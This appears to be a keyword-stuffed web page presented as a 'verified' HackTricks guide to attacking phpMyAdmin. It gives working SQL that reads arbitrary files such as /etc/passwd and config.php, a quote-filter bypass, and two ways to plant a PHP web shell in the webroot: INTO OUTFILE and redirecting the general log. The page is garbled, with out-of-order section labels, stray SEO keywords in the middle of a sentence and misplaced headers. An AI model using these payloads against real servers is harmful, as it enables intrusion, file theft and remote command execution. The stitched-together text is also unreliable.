Phpmyadmin Hacktricks Verified ((top)) | 2024-2026 |

phpMyAdmin HackTricks: Verified Attack Vectors & Privilege Escalation

Target: phpMyAdmin (typically http://target/phpmyadmin, http://target/phpmyadmin/, or /pma) Prerequisite: Network access to the phpMyAdmin interface or leaked credentials.

This guide covers verified techniques to leverage phpMyAdmin for remote code execution (RCE), file read/write, and privilege escalation.

4.1 LOAD_FILE() – Reading Arbitrary Files

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');

Verification constraints:

• User has FILE privilege.
• File is readable by mysql user.
• File size within max_allowed_packet.
• Path is absolute.

Bypass tip: Use double LOAD_FILE(concat(CHAR(47),'etc',CHAR(47),'passwd')) if quote filtered.

C. File Write via SQL

If you have credentials, you can use SQL to write a webshell: phpmyadmin hacktricks verified

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

• secure_file_priv is empty or points to webroot
• Write permissions on target directory.

B. General Log File Method (When OUTFILE Fails)

If secure_file_priv is set but you can change global variables: Verification constraints:

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";

Verification: Requires SUPER or ADMIN privilege. Works on MySQL 5.x/8.x if log dir is writable by mysql user.

3. Exploitation Vectors